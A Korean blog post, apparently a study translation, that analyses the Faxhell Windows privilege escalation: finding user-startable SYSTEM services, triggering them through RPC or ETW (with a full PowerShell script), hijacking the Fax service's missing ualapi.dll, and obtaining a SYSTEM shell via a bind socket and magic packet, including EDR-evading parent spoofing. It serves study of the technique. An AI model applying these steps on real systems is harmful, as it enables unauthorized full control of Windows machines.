🪟

Faxhell

Date

Select

0. Original Posting

https://windows-internals.com/faxing-your-way-to-system/

해당 포스팅은 원문 포스트를 공부하며 한글로 번역하였으므로,

영어가 더 편하시거나, 더 세부적인 내용을 원하시는 분은 원문 포스트를 추천드립니다.

This Posting was only written in Korean

if you want more detailed posting, or prefer English, plz visit original posting

1. Faxhell

DLL 하이제킹의 일종이며, Fax Service를 이용하여 로컬 권한 상승을 하였기 때문에 Fax Shell > Faxhell로 지칭한다.

조건

높은 권한으로 실행되는 서비스 중 일반 유저의 권한으로 서비스 실행이 가능해야하며

경로에 존재하지 않는 dll을 로드하는 프로세스를 찾아야한다.

1.1 환경 조사

주로 사용되는 4가지의 기본 제공 서비스를 확인해보았다.

#### Wmiprvse.exe.

해당 서비스는 C:\windows\system32\wbem\에서 특정 파일들을 로드한다. 특히 Wbemcomn.dll 같은 파일

예전에는 WMI 커맨드로 스스로 시스템 권한 받을수 있었는데, 지금은 직접 WMI 제공자 통해서 권한 받아야 한다.

안전한 파일을 온라인상에서 이제 구할수 없다.

너무나 잘 알려진 서비스랑 DLL이기 때문에 많은 멀웨어와 많은 사람들이 해당 서비스를 토대로  POC를 구현한다.

#### Ikeext.dll

svchost.exe안에서 실행되며, c:\windows\system32\ 경로에 존재하는 Wlcsctrl.dll 을 로드한다.

해당 dll은 VPN이 구축된 회사 내부망에서 이미 실행되고 있으나 해당 서비스를 종료할 때는 Admin 권한이 필요하다.

해당 서비스가 실행이 안되어 있더라도, sc start로 실행하지 못하며, Rasdial.exe를 통하여 시작해야 한다.

#### Sessenv.dll

svchost.exe 안에서 실행되며, C:\windows\system32\ 경로에 존재하는 Tsmsisrv.dll을 로드한다.

RDP 시스템을 건드리지 않으면 실행되지 않는 장점이 있다.

그러나 Start/Stop 시 권한을 부여하지 않으며, 실행할만한 마땅한 트리거가 없다.

#### Searchprotocolhost.exe 및 Searchindexer.exe

C:\windows\system32\ 경로에 존재하는 msfte.dll을 로드한다.

권한이 없는 유저는 직접적으로 시작하지 못하나 noisy file-system activity를 트리거로 사용하여 서비스를 실행 할 수 있다.

1.2 서비스 찾기

개요에서도 설명했지만 아래의 조건에 부합하는 서비스를 찾아야 한다.

재부팅 하지 않고 권한 상승이 가능해야 하며

기본 권한(User) 로 시작 하거나, 중지할 수 있어야 한다.

시스템 권한으로 실행 되는 서비스어야 한다. (Local Service, Networ Service 제외)
해당 서비스는 Administrator 그룹에 속해 있기 때문이다.

#### Process Hacker를 이용한 권한 확인

Process Hacker 서비스를 이용해서 찾아 볼 수 있다.

ProcessHacker → Service Tab → Service Double Click(SessionEnv) → Permission → advanced → Double Click(Access Control Entries)

#### accesschk를 이용한 권한 확인

Accesschk를 이용하여 모든 서비스에 대한 모든 사용자 권한을 SDDL(Security Descriptor Definition Language)로 확인 가능하다.

accesschk.exe -c * -L > servsddl.txt

SessionEnv의 SDDL은 아래와 같다.

SessionEnv
  O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;RPWP;;;S-1-5-80-446051430-1559341753-4161941529-1950928533-810483104)(A;;RPWP;;;S-1-5-80-4130899010-3337817248-2959896732-3640118089-1866760602)
C++
복사

accesschk.exe에서 l 옵션을 이용하면 아래와 같이 출력된다.

DsSvc의 경우 모든 유저가 서비스 실행 권한을 가지고 있으며

이러한 서비스가 2번 및 3번 조건에 부합되는 서비스이다.

accesschk.exe -c dssvc -l

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

dssvc
  DESCRIPTOR FLAGS:
      [SE_DACL_PRESENT]
  OWNER: NT AUTHORITY\SYSTEM // 3번 조건 부합
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\INTERACTIVE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [1] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SERVICE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [2] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  [3] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  [4] ACCESS_ALLOWED_ACE_TYPE: Everyone // 서비스 실행 권한 존재
        SERVICE_QUERY_STATUS
        SERVICE_START
  [5] ACCESS_ALLOWED_ACE_TYPE: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
        SERVICE_QUERY_STATUS
        SERVICE_START
C++
복사

Fax 서비스 또한 이러한 조건에 부합하는 서비스중 하나이다.

accesschk.exe -c FAX -l

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

FAX
  DESCRIPTOR FLAGS:
      [SE_DACL_PRESENT]
  OWNER: NT AUTHORITY\SYSTEM
  [0] ACCESS_ALLOWED_ACE_TYPE: Everyone
        SERVICE_QUERY_STATUS
        SERVICE_START
  [1] ACCESS_ALLOWED_ACE_TYPE: NT SERVICE\Fax
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [2] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  [3] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
C++
복사

1.3 서비스 시작하기

윈도우 Vista 이후로, 마이크로소프트는 UBPM을 도입했는데, 해당 기능은 리눅스, 맥과 비슷한 경항을 가지고 있다.

트리거를 이용하여 시스템 서비스 시작이 가능하며, PnpDevice 등등 // 정리

Service Control Manager(SCM)은 서비스의 트리거가 작동했을때 서비스 상태를 업데이트(시작) 해주며 트리거의 경우 GUI로 프로세스 해커에서 간단하게 확인이 가능하다.

ProcessHacker Service Tab → Some Service Double Click → Triggers Tab → Trigger Double Click

아래는 TabletInputService의 트리거이다

SC 명령어를 이용해서도 확인이 가능하다.

sc qtriggerinfo DsSvc // Check a Triggers

[SC] QueryServiceConfig2 SUCCESS

SERVICE_NAME: DsSvc

        START SERVICE
          NETWORK EVENT                : bc90d167-9470-4139-a9ba-be0bbbf5b74d [RPC INTERFACE EVENT]
            DATA                       : BF4DC912-E52F-4904-8EBE-9317C1BDD497


sc query DsSvc // Check a Service's Status 

SERVICE_NAME: DsSvc
        TYPE               : 30  WIN32
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
C++
복사

RPC INTERFACE EVENT로 라벨링 된 GUID의 경우 MSDN에서는 이렇게 설명하고 있다

“The event is triggered when an endpoint resolution request arrives for the RPC interface GUID specified by pDataItems.”

Endpoint Resolution 요청이 pDataItems에 특정된 RPC로 도착할 때 이벤트가 트리거 된다고 설명되어 있다.

rpcping을 이용하여 서비스 활성화를 확인해본다.

rpcping -t ncalrpc -f BF4DC912-E52F-4904-8EBE-9317C1BDD497 -v 2

RPCPing v6.0. Copyright (C) Microsoft Corporation, 2002-2006
Trying to resolve interface BF4DC912-E52F-4904-8EBE9317C1BDD497, Version: 1.0
Completed 1 calls in 1 ms
1000 T/S or   1.000 ms/T

sc query dssvc
SERVICE_NAME: dssvc
    TYPE               : 30  WIN32
    STATE              : 4  RUNNING
                         (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
C++
복사

rpcping의 응답을 확인했고, 해당 서비스가 running중인걸 확인하였다.

또 다른 트리거로는 ETW(Event Tracing for Windows) 트리거가 있다.

sc qtriggerinfo wersvc
[SC] QueryServiceConfig2 SUCCESS

SERVICE_NAME: wersvc

        START SERVICE
          CUSTOM                       : e46eead8-0c54-4489-9898-8fa79d059e0e [ETW PROVIDER UUID]
C++
복사

ETW의 경우는 PowerShell을 이용하여 트리거를 실행 할 수 있다.

$Source = @"
using System;
using System.Text;
using System.Security;
using System.Collections.Generic;
using System.Runtime.Versioning;
using Microsoft.Win32.SafeHandles;
using System.Runtime.InteropServices;
using System.Diagnostics.CodeAnalysis;
namespace JosL.WebClient{
public static class Starter{
[StructLayout(LayoutKind.Explicit, Size=16)]
public class EVENT_DESCRIPTOR{
[FieldOffset(0)]ushort Id = 1;
[FieldOffset(2)]byte Version = 0;
[FieldOffset(3)]byte Channel = 0;
[FieldOffset(4)]byte Level = 4;
[FieldOffset(5)]byte Opcode = 0;
[FieldOffset(6)]ushort Task = 0;
[FieldOffset(8)]long Keyword = 0;
}
 
[StructLayout(LayoutKind.Explicit, Size = 16)]
public struct EventData{
[FieldOffset(0)]
internal UInt64 DataPointer;
[FieldOffset(8)]
internal uint Size;
[FieldOffset(12)]
internal int Reserved;
}
 
public static void startService(){
Guid webClientTrigger = new Guid(0xe46eead8, 0x0c54, 0x4489, 0x98, 0x98, 0x8f, 0xa7, 0x9d, 0x05, 0x9e, 0x0e);
 
long handle = 0;
uint output = EventRegister(ref webClientTrigger, IntPtr.Zero, IntPtr.Zero, ref handle);
 
bool success = false;
 
if (output == 0){
EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR();
unsafe
{
uint writeOutput = EventWrite(handle, ref desc, 0, null);
success = writeOutput == 0;
EventUnregister(handle);
}
}
}
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventRegister(ref Guid guid, [Optional] IntPtr EnableCallback, [Optional] IntPtr CallbackContext, [In][Out] ref long RegHandle);
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern unsafe uint EventWrite(long RegHandle, ref EVENT_DESCRIPTOR EventDescriptor, uint UserDataCount, EventData* UserData);
 
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventUnregister(long RegHandle);
}
}
"@
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$compilerParameters.CompilerOptions="/unsafe"
Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $compilerParameters
[JosL.WebClient.Starter]::startService()
C++
복사

해당 스크립트를 실행하면 서비스가 실행된다.

sc query wersvc

SERVICE_NAME: wersvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
C++
복사

1.3 DLL Hijacking

다시 Fax 서비스로 돌아와서 fax 서비스가 실행되면, fxssvc.exe 파일이 C:\windows\system32\uaiapi.dll파일 로드하는것을 확인 할 수 있다.

하지만 세가지 문제점이 존재하는데

해당 서비스가 SYSTEM 권한이 아닌 NETWORK SERVICE 권한으로 실행된다.

해당 서비스가 GetProcAddress API를 이용하여 ualapi.dll 에서 dllexport 함수를 찾는다.

해당 서비스는 실제 팩스가 있지 않으면 시작과 거의 동시에 종료된다. 그래서 해당 서비스를 유지하려면 실제 팩스를 대기시키거나, 종료되지 않도록 스레드를 실행시켜놔야 한다.

2번과 3번을 같이 해결하려고 했으며,

일반적으로 악의적인 권한 상승 공격의 경우 Dllmain을 이용하지만, 해당 취약점은 System권한 획득이 목적이기 때문에 더 어려우며, 임베디드 바인드 쉘을 개발하는게 더 현명한 방법이다.

두번째로는 Dllmain 에서 모든 작업을 수행하는것은 상당히 의심스러운 파일로 취급된다.

마지막으로 Dllmain은 Dll이 로드될때 호출되며, 로더 잠금이 홀드되며, 상당히 어려워진다.

•

로더 잠금의 경우 dllmain 호출 시 권한에 관련된 MS 검증 로직인것으로 예상됨. 향후 정리 필요

그래서 Dllmain에서 모든 작업을 하지 않고 다른 방법을 찾아봤으며, Fax서비스에서 Ualapi.dll을 호출할 때 다른 세가지의 함수를 호출하는 것을 확인하였다.

__int64 UalOpenSession()
{
  HMODULE v0; // rax
  DWORD v1; // ecx
  __int64 result; // rax
  DWORD v3; // ebx
  int (__stdcall *v4)(struct tagUAL_DATA_BLOB *); // rax
  int v5; // [rsp+20h] [rbp-2C8h]
  __int128 v6; // [rsp+24h] [rbp-2C4h]
  char Dst; // [rsp+34h] [rbp-2B4h]

  if ( ualapiModule )
    goto LABEL_15;
  v0 = LoadLibraryExW(L"ualapi.dll", 0i64, 0x800u);
  ualapiModule = v0;
  if ( !v0 )
  {
    v1 = GetLastError();
    result = (unsigned __int16)v1 | 0x80070000;
    if ( (signed int)v1 <= 0 )
      result = v1;
    return result;
  }
  fnUalInstrument = (int (__stdcall *)(struct tagUAL_DATA_BLOB *))GetProcAddress(v0, "UalInstrument");
  if ( fnUalInstrument )
  {
    fnUalStart = (int (__stdcall *)(struct tagUAL_DATA_BLOB *))GetProcAddress(ualapiModule, "UalStart");
    if ( fnUalStart )
    {
      fnUalStop = (int (__stdcall *)(struct tagUAL_DATA_BLOB *))GetProcAddress(ualapiModule, "UalStop");
      if ( fnUalStop )
      {
LABEL_15:
        memset_0(&Dst, 0, 0x29Cui64);
        v4 = fnUalStart;
        v5 = 688;
        _mm_storeu_si128((__m128i *)&v6, (__m128i)SumGuid_FAX);
        return ((__int64 (__fastcall *)(int *))v4)(&v5);
      }
    }
  }
  v3 = GetLastError();
  FreeLibrary(ualapiModule);
  ualapiModule = 0i64;
  fnUalInstrument = 0i64;
  fnUalStart = 0i64;
  fnUalStop = 0i64;
  result = (unsigned __int16)v3 | 0x80070000;
  if ( (signed int)v3 <= 0 )
    result = v3;
  return result;
}
C++
복사

해당 소스를 확인해보면, ualapi.dll을 로드하고 세 함수(UalInstrument, UalStart, UalStart)를 순서대로 호출한다.

Faxhell 코드의 경우 UalStart에서 권한 상승 코드를 실행하며, UalStop, UalInstrument의 경우 0을 리턴하도록 하였다.

__declspec(dllexport)
HRESULT
UalStop(PVOID Blob)
{
    UNREFERENCED_PARAMETER(Blob);
    return ERROR_SUCCESS;
}

__declspec(dllexport)
HRESULT
UalInstrument(PVOID Blob)
{
    UNREFERENCED_PARAMETER(Blob);
    return ERROR_SUCCESS;
}
C++
복사

2. PoC 실행

•

테스트 환경

Windows 10 1709 (16299.15)

faxhell 코드를 빌드 한 후 테스트 환경의 "C:\windows\system32" 경로로 옮긴다.

fax 서비스를 실행한다. (User 권한)

실행하면 Fax 서비스는 Start pending 상태로 유지되며 NETWORK SERVICE 권한으로 실행 된 fxssvc가 9299 포트를 오픈하고 Listen 상태로 대기중이다.

해당 포트에 접속하여 매직 패킷을 입력하면 SYSTEM권한을 가진 CMD를 획득할 수 있다

C:\Users\User>C:\Users\User\Desktop\nc64.exe 192.168.145.137 9299
let me in //매직 패킷
READY
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C++
복사

2.1 PoC 소스 분석

위에서 UalInstrument, UalStop 함수를 확인했으므로 UalStart 만 확인해보자.

...
    while (1)
    {
        //
        // Execute the work callback that will take care of
        //
        work = CreateThreadpoolWork(WorkCallback, &hResult, &CallBackEnviron); //Thread Pool 생성 후 WorkCallback 함수 할당
        if (work == NULL)
        {
            goto Failure;
        }

        //
        // Send the work and wait for it to complete
        //
        SubmitThreadpoolWork(work);
        WaitForThreadpoolWorkCallbacks(work, FALSE);
        if (FAILED(hResult))
        {
            break;
        }

        //
        // We're done with this work
        //
        CloseThreadpoolWork(work);
    }
...
C++
복사

Thread Pool을 생성하여 WorkCallBack 함수를 스레드에 할당한다.

아래에 WorkCallBack 함수와 AcceptCallBack 함수의 호출 순서를 정리해놓았다.

소스와 함께 보는것을 추천하며, 해당 함수의 경우 소스가 상당히 길어 포스팅에 넣지 못했다.

#### 2.2.1 WorkCallback 함수 순서

GetRpcssToken  함수로 NamePipe 생성 및 파이프 impersonate

GetServiceHandle 로컬 함수로 "rpcss" 이름의 서비스 생성 및 QueryServiceStatusEx함수를 이용하여 SERVICE_STATUS_PROCESS 구조체 획득하여 서비스 프로세스 핸들(OpenProcess API) OUT 파라미터로 전달

GetSystemTokenFromProcess  함수 호출

GetTokenObjectIndex 함수 호출하여 OpenProcessToken으로 현재 프로세스 토큰 획득 NtQueryInformation을 이용하여 토근에 대한 OBJECT_TYPE_INFORMATION 구조체를 받아와서 해당 구조체의 TypeIndex를 OUT 파라미터로 전달.
- TypeIndex에 대한 포스팅

GetSystemTokenFromProcess 함수 호출

rpcss 서비스 프로세스 핸들 값으로  NtQueryInformationProcess으로 핸들 갯수 확인 및 힙 할당 후 재호출하여 핸들 정보 획득

ii.

해당 핸들 값 중 TokenTypeIndex가 동일하고 GrantedAccess 권한이 TOKEN_ALL_ACCESS인 핸들 확인하여 DuplicateHandle 로 핸들 복제하여 현재 프로세스와 dupHandle 변수에 저장. 해당 DuplicateHandle 수행으로 인해 현재 프로세스가 해당 권한을 가진 핸들을 소유하게 됨.

iii.

dupHandle 변수 이용하여 GetTokenInformation으로 해당 토큰의 TOKEN_STATISTIC 정보 획득

iv.

해당 토큰이 나타내는 세션이 들고있는 LUID이 SYSTEM_LUID(0x3e7) 이며 가지고 있는 특권이 22개 이상인 경우 현재 스레드에 dupHandle 토큰 설정

WSAStartup 함수 이용하여 Winsock 초기화

WSASocket 함수 이용하여 ListenSocket, LocalSocket 생성

WSAIoCTL 함수로 WSAAcceptEx와 TransmitPackets 포인터 획득

GetServiceHandle 함수 이용하여 "DcomLaunch" 서비스의 핸들을 parentHandle로 받음

DuplicateHandle 함수 이용하여 LocalSocket 의 핸들을 DcomLaunch 서비스 프로세스와 newSocket 핸들값으로 복제 
// 본문에서는 해당 작업에 대한 이유를 EDR과 같은 솔루션 탐지를 우회하기 위함이라고 설명함.

RevertToSelf 함수 호출하여 impersonation 종료

10.

ACCEPT_CONTEXT 구조체 메모리 할당 // 추가설명필요

11.

ACPPET_CONTEXT 구조체 값 할당 및 ThreadPool에 AcceptCallBack 함수 Input

12.

로컬 연결용 AddrInfo 구조체 메모리 할당 및 값 할당 후 GetAddrInfo 함수로 pResult 변수로 재할당

13.

bind 함수로 listenSocket 바인딩

14.

listen 함수로 listenSocket listening 상태로 변경

15.

StartThreadPoolIo 호출 및 소켓 AcceptEx 함수 호출

16.

AcceptEx 함수가 False가 아니고 입력받은 패킷이 0이 아닐경우 AcceptCallback 함수 호출

#### 2.2.2 AcceptCallBack 함수 순서

입력받은 Context 구조체에서 처음 패킷 정보를 가져와 ValidateMagicPacket 함수 호출

MagicPacket이 정의되어 있으며( "let me in" )  해당 값과 사이즈, 패킷이 같을 경우에만 ERROR_SUCCESS 리턴

InitializeProcTHreadAttributeList 함수로 Attribute ListSize 획득

Attribute ListSize 만큼 힙 메모리 할당

InitializeProcTHreadAttributeList 함수로 프로세스 Attribute 획득

Parent Process (DcomLaunch)의 Attribute로 현재 Attribute값 설정

STARTUPINFOEX 구조체에 소켓핸들, Attribute 할당 후 CreateProcess로 CMD 실행

위와 같은 순서대로 함수가 진행된다.

WorkCallBack 함수에서 권한과 관련된 작업을 수행하며, AcceptCallBack 함수에서 Attribute 설정 및 CMD를 실행한다.

Attribute의 경우 Setprivilege&AccessTokenPrivilege 포스팅에서 조금 다룬 적 있으니 참고하길 바란다.

3. Outro

잘못된 부분에 대한 수정 요청은 언제든지 환영입니다.

•

SDDL 링크 https://itconnect.uw.edu/wares/msinf/other-help/understanding-sddl-syntax/ 

•

faxhell 링크 https://github.com/ionescu007/faxhell

•

OBJECT_TYPE_INFORMATION Structure https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ob/obquery/type.htm